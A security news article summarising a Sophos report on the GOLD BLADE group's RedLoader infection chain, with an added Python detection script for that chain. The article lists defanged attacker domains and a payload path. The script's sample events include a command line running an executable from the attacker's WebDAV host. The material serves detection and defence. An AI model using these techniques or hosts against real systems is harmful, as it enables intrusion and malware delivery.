The observed RedLoader execution chain | Image: Sophos
Sophos analysts have uncovered a newly combined infection technique used by the GOLD BLADE cybercriminal group to deliver their custom RedLoader malware, in what researchers describe as a previously unreported attack sequence that merges multiple known evasion tactics into a cohesive and dangerous new execution chain.
“The combination observed in July 2025 represents a method for initial execution that has not been publicly reported,” Sophos notes, marking a significant evolution in RedLoader’s deployment strategy.
The attack begins with social engineering. GOLD BLADE operators send a malicious PDF masquerading as a job application cover letter via third-party job platforms like Indeed. The PDF contains a malicious link that downloads a ZIP archive, which in turn contains a LNK file disguised as a PDF.
From there, the execution chain proceeds as follows:
- The LNK file launches conhost.exe, Windows’ console host.
- This spawns a WebDAV connection to a Cloudflare-hosted domain: automatinghrservices[.]workers[.]dev.
- A signed executable, a renamed version of Adobe’s ADNotificationManager.exe, is pulled from the attacker’s server under the guise of a resume: dav[.]automatinghrservices[.]workers[.]dev/SSL/DavWWWRoot/CV-APP-2012-68907872.exe
- This benign executable sideloads a malicious DLL named netutils.dll, initiating RedLoader stage 1.
- Stage 1 creates a scheduled task called BrowserQE\BrowserQE_<Base64-encoded computer name> and fetches a standalone stage 2 payload from: live[.]airemoteplant[.]workers[.]dev.
- The task then executes the custom stage 2 binary via PCALua.exe and conhost.exe.
- Finally, stage 2 establishes command-and-control (C2) communication with attacker infrastructure.
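Each step of the chain above leaves a distinct artifact in endpoint telemetry, and the value for defenders is in correlating them. The following is an added detection example, not code from Sophos or from the report: it runs five rules over Sysmon-like process, image-load and scheduled-task events (conhost.exe handling a WebDAV `DavWWWRoot` path, a signed executable whose version-info OriginalFileName does not match its on-disk name, netutils.dll loaded from outside the Windows system directories, the `BrowserQE\BrowserQE_<Base64>` task name, and a process spawned by PCALua.exe). The event dictionaries, the host name, the `@SSL` UNC form, the stage 2 file path and the `PCALua.exe -a` action string are all constructed for the example and are not taken from the report.

```python
"""Detection logic for the RedLoader chain: conhost.exe over WebDAV, a renamed
signed binary sideloading netutils.dll, the BrowserQE scheduled task, and
PCALua.exe proxying execution. Event shape and values are constructed."""
import base64
import binascii
import ntpath
import re
from dataclasses import dataclass

# UNC path through the Windows WebDAV client (host, optional @SSL, DavWWWRoot).
WEBDAV_UNC = re.compile(r"\\\\[\w.\-@]+(?:\\[\w.\-]+)*\\DavWWWRoot\\", re.IGNORECASE)
# Task name reported by Sophos: BrowserQE\BrowserQE_<Base64-encoded computer name>.
TASK_NAME = re.compile(r"^\\?BrowserQE\\BrowserQE_([A-Za-z0-9+/]+={0,2})$")
# netutils.dll is a Windows system DLL; a copy loaded from anywhere else is suspect.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _decode_b64(blob: str):
    """Return the decoded text, or None if the task-name suffix is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def detect(events):
    """Run the rules over a list of event dicts and return the Findings raised."""
    findings = []
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    for e in events:
        if e["type"] == "process":
            image = _basename(e["image"])
            cmdline = e.get("cmdline", "")
            parent = procs.get(e["ppid"])
            # Rule 1: conhost.exe acting on a payload reached over WebDAV.
            if image == "conhost.exe" and WEBDAV_UNC.search(cmdline):
                findings.append(Finding("conhost_webdav", e["pid"], cmdline))
            # Rule 2: PE version-info OriginalFileName disagrees with the on-disk
            # name, i.e. a renamed (here signed Adobe) executable.
            orig = e.get("original_filename")
            if orig and orig.lower() != image:
                findings.append(Finding("renamed_signed_binary", e["pid"],
                                        f"{image} has OriginalFileName {orig}"))
            # Rule 3: PCALua.exe used as an execution proxy for the next stage.
            if parent and _basename(parent["image"]) == "pcalua.exe":
                findings.append(Finding("pcalua_child", e["pid"],
                                        f"{image} spawned by PCALua.exe"))
        elif e["type"] == "image_load":
            path = e["image"].lower()
            # Rule 4: netutils.dll sideloaded from a non-system directory.
            if _basename(path) == "netutils.dll" and not path.startswith(SYSTEM_DIRS):
                findings.append(Finding("netutils_sideload", e["pid"], e["image"]))
        elif e["type"] == "task_create":
            # Rule 5: the stage 1 persistence task; decode the computer name for context.
            m = TASK_NAME.match(e["task_name"])
            if m:
                host = _decode_b64(m.group(1))
                findings.append(Finding("redloader_task", e["pid"],
                                        f"task for computer {host!r}: {e['action']}"))
    return findings


COMPUTER_NAME_B64 = base64.b64encode(b"DESKTOP-EXAMPLE").decode()  # constructed host name
WEBDAV_ROOT = r"\\dav.automatinghrservices.workers.dev@SSL\DavWWWRoot"  # assumed UNC form
SAMPLE_EVENTS = [  # constructed, Sysmon-like events; not real telemetry
    {"type": "process", "pid": 4100, "ppid": 3000, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": rf"conhost.exe {WEBDAV_ROOT}\CV-APP-2012-68907872.exe"},
    {"type": "process", "pid": 4101, "ppid": 4100, "image": rf"{WEBDAV_ROOT}\CV-APP-2012-68907872.exe",
     "cmdline": "CV-APP-2012-68907872.exe", "original_filename": "ADNotificationManager.exe"},
    {"type": "image_load", "pid": 4101, "image": rf"{WEBDAV_ROOT}\netutils.dll"},
    {"type": "task_create", "pid": 4101, "task_name": rf"\BrowserQE\BrowserQE_{COMPUTER_NAME_B64}",
     # The action string and stage 2 path are assumed; the report does not give them.
     "action": r"C:\Windows\System32\PCALua.exe -a C:\Users\alice\AppData\Local\stage2.exe"},
    {"type": "process", "pid": 4200, "ppid": 900, "image": r"C:\Windows\System32\PCALua.exe",
     "cmdline": "PCALua.exe -a ..."},
    {"type": "process", "pid": 4201, "ppid": 4200, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"conhost.exe C:\Users\alice\AppData\Local\stage2.exe"},
    # Ordinary conhost.exe, as spawned for any console process; must not fire.
    {"type": "process", "pid": 4300, "ppid": 3000, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Each rule is weak on its own (conhost.exe is ubiquitous, and renamed signed binaries occur in legitimate software), so in practice the findings should be grouped by process tree and host so that two or more rules firing in one tree within a short window raise the alert; the benign conhost.exe event in the sample shows that the WebDAV rule alone stays quiet on normal console launches.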
“While this executable name is victim-specific, the SHA256 hash is consistent across all samples observed by Sophos analysts,” the report adds.
While GOLD BLADE has historically used LNK files, WebDAV-hosted payloads, and DLL sideloading, this is the first time they’ve combined all three in a single infection chain.
Sophos notes:
“The July activity shows how threat actors can combine prior techniques to modify their attack chain and bypass defenses.”
This campaign showcases how attackers reuse familiar tools in novel combinations to elude endpoint detection and gain execution on target machines with minimal friction.
Sophos recommends deploying Software Restriction Policies via Group Policy to block .lnk files in commonly abused locations such as:
- C:\Users\*\Downloads\*.lnk
- %AppDataLocal%\*.lnk
- %AppDataRoaming%\*.lnk
Security teams are also urged to review IoCs available in Sophos’s official GitHub repository.